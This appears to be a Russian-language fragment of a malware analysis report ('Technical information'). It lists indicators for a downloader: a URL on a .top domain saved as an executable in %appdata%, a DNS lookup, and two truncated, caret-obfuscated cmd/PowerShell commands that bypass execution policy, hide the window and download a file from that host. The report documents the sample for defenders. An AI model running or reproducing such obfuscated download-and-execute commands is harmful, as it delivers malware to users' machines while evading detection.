Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^erShE^ll.EXe ^-^E^XeC^uT^IONP^oli^C^y^ bypaS^S -^n^oPrO^fILe -WI^N^DoWS^t^Yle^ ^h^idD^EN (NE^W-o^B^Ject ^sysT^E^M^.^NeT.we^b^cL^I^eNt).^dO^WNLO^a^DF^iLE('http://www.zoerpoled.t...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POW^erShE^ll.EXe ^-^E^XeC^uT^IONP^oli^C^y^ bypaS^S -^n^oPrO^fILe -WI^N^DoWS^t^Yle^ ^h^idD^EN (NE^W-o^B^Ject ^sysT^E^M^.^NeT.we^b^cL^I^eNt).^dO^WNLO^a^DF^iLE('http://www.zoerpoled.t...' (со скрытым окном)